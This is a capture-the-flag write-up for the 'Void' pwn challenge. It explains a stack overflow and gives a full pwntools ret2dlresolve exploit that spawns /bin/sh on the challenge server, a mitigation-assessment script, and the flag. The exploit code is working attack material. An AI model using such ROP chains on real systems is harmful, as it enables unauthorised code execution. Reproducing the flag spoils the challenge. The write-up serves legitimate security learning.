# Pwn - Void

## Description

The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.

## Downloads

{% file src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2F8mYihELGOKoyzMc3LGA1%2Fpwn_void.zip?alt=media&token=4201c6e9-6d3a-420f-b105-150d040487a5" %}

## Solution

<div align="left"><figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FUUjdH3lCO7O6zkqc2zN1%2Fimage.png?alt=media&#x26;token=3d41c4c1-deaa-45d4-996d-096a44b5699a" alt=""><figcaption><p><code>checksec</code> output</p></figcaption></figure></div>

The binary is very simple, with a `vuln()` function that has an obvious stack buffer overflow.

![](https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FPycUfkNa0FrMs0kMCZWO%2Fimage.png?alt=media&token=44a5d617-3b9a-4c79-9c9e-90dfb60b5dcb)

Looking at the GOT, there is only `read` available.

<div align="left"><figure><img src="https://4077916634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F9J6tnLQGbY0Or10P4xUT%2Fuploads%2FRbqzX7trKhr9287r1RML%2Fimage.png?alt=media&#x26;token=ecd0d586-ca5e-47ef-8284-2eaf1cca995f" alt=""><figcaption><p>GOT</p></figcaption></figure></div>

Three observations point at the technique to use:

1. There is no win function anywhere.
2. There is no function like `puts` in the GOT to leak a libc address.
3. There is relatively large space to hold a payload (`read(0, buf, 200)`).

This suggests that we'll need a ret2dlresolve ROP chain.
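As an added check (not part of the original writeup), the triage above can be turned into a small assessment script: it takes the facts that `checksec` and the GOT dump show and reports which build-time mitigation would have closed the ret2dlresolve path, i.e. what to fix in the build. `Surface`, `assess`, `surface_from_elf` and the sample values are my own names and constructed inputs, not from the challenge binary.

```python
from dataclasses import dataclass
from typing import Dict, List

# Imported functions that can print or send memory contents, i.e. the kind of
# libc-leak primitive the writeup notes is absent from this binary's GOT.
LEAK_CAPABLE = {"puts", "printf", "write", "send", "fprintf", "dprintf", "fwrite"}


@dataclass
class Surface:
    relro: str              # "Full", "Partial" or "No", as checksec reports it
    pie: bool
    canary: bool
    got_symbols: List[str]  # names present in the GOT (the writeup found only `read`)


def assess(s: Surface) -> Dict[str, object]:
    """Return which build-time mitigations close the ret2dlresolve path."""
    closed_by: List[str] = []
    if s.relro == "Full":
        closed_by.append("Full RELRO (-Wl,-z,relro,-z,now): every import is bound at load "
                         "time, so there is no lazy _dl_runtime_resolve call to redirect")
    if s.pie:
        closed_by.append("PIE (-fPIE -pie): the .bss address for the fake structures is "
                         "not known without a separate leak")
    if s.canary:
        closed_by.append("stack protector (-fstack-protector-strong): the overflow cannot "
                         "reach the saved return address without leaking the canary")
    leaks = sorted(LEAK_CAPABLE & set(s.got_symbols))
    return {
        "unmitigated": not closed_by,
        "closed_by": closed_by,
        # A leak primitive explains why ret2dlresolve was chosen when absent;
        # its absence is not a mitigation, so it is reported separately.
        "leak_primitives": leaks,
    }


def surface_from_elf(path: str) -> Surface:
    """Read the same facts checksec and the GOT dump show, via pwntools."""
    from pwn import ELF  # imported lazily so assess() runs without pwntools installed
    e = ELF(path, checksec=False)
    return Surface(relro=e.relro or "No", pie=bool(e.pie), canary=bool(e.canary),
                   got_symbols=list(e.got))


if __name__ == "__main__":
    import sys
    for key, value in assess(surface_from_elf(sys.argv[1])).items():
        print(f"{key}: {value}")
```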

Firstly, the code to find the padding needed to control `rip`.

{% code lineNumbers="true" %}

```python
from pwn import *
import os

binary = context.binary = ELF("./void")

# Crash the process with a De Bruijn pattern and recover the offset from the core dump
p = process(binary.path)
p.sendline(cyclic(1024, n=8))
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
# `ret` faults on the non-canonical pattern value, so rsp still points at the
# overwritten return address; find that 8-byte chunk's offset in the pattern
padding = cyclic_find(core.read(core.rsp, 8), n=8)
log.info('Padding: ' + str(padding) + " (" + hex(padding) + ")")
```

{% endcode %}

We find the padding needed to be 72 bytes. We then proceed to build the dlresolve ROP chain with `pwntools`. While the concept itself is not straightforward, the exploit is easy to write with `pwntools`; the entire exploit code is as follows:

{% code lineNumbers="true" %}

```python
from pwn import *

binary = context.binary = ELF("./void")

rop = ROP(binary)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(binary, symbol='system', args=['/bin/sh'])

rop.raw('A' * 72)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

# send payload
p = remote("178.62.64.13", 30663)

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()
```

{% endcode %}

Flag: `HTB{r3s0lv3_th3_d4rkn355}`
